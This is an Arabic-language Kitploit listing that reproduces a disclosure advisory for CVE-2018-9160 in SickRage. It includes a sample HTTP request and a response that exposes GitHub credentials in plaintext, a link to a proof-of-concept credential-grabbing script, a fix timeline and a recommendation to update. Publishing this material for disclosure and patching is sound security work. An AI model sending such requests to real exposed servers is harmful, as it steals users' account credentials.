Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/mechanico/sickragewtf
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubmechanico/sickragewtf

sickrageWTF

CVE-2018-9160

عرض المستودع
2منذ 8 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

بيانات اعتماد github بنص واضح في Sickrage CVE-2018-9160


  1. نظرة عامة

عنوان الاستغلال: بيانات اعتماد نصية واضحة في استجابة HTTP في SickRage
التاريخ: 2018-04-01
مؤلف الاستغلال: Sven Fassbender
التواصل: https://twitter.com/mezdanak
الصفحة الرئيسية للمورّد: https://sickrage.github.io
رابط البرنامج: https://github.com/SickRage/SickRage
الإصدار: < v2018.03.09-1
CVE : CVE-2018-9160
الفئة: تطبيقات الويب


  1. معلومات أساسية

"SickRage هو مدير تلقائي لمكتبة الفيديو للبرامج التلفزيونية.
فهو يترقب الحلقات الجديدة لبرامجك المفضلة، وعندما تُنشر يقوم بسحره:
البحث التلقائي عن torrent/nzb، والتنزيل، والمعالجة بالجودات التي تريدها." --مقتطف من https://sickrage.github.io


  1. وصف الثغرة

يُعيد SickRage بيانات اعتماد نصية واضحة لخدمات مثل GitHub وAniDB وKodi وPlex وغيرها في استجابات HTTP.
الشرط المسبق هو ألا يكون المستخدم قد عيّن اسم مستخدم وكلمة مرور لتثبيت SickRage الخاص به. (غير مفروض، افتراضي)

طلب HTTP:

root@kitploit:~
GET /config/general/ HTTP/1.1  
Host: 192.168.1.13:8081  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.1.13:8081/config/backuprestore/  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  

استجابة HTTP:

root@kitploit:~
HTTP/1.1 200 OK  
Content-Length: 113397  
Vary: Accept-Encoding  
Server: TornadoServer/4.5.1  
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"  
Date: Fri, 02 Mar 2018 10:47:51 GMT  
Content-Type: text/html; charset=UTF-8  

<!DOCTYPE html>  
<html lang="nl_NL">  
    <head>  
		[...]  
        <input type="text" name="git_username" id="git_username" value="[email protected]" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />  
        [...]  
        <input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />  
		[...]  
        </div>  
    </body>  
</html>  

  1. إثبات المفهوم

https://github.com/mechanico/sickrageWTF/blob/master/get_github_creds_sickrage.py


  1. الجدول الزمني

[2018-03-07] تم اكتشاف الثغرة
[2018-03-08] تم التواصل مع المورّد
[2018-03-08] ردّ المورّد
[2018-03-09] تم إصلاح الثغرة. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)


  1. التوصية

حدّث تثبيت SickRage إلى الإصدار v2018.03.09-1 أو أحدث.
احمِ الوصول إلى تطبيق الويب باستخدام بيانات اعتماد مستخدم مناسبة.


تنزيل الأداة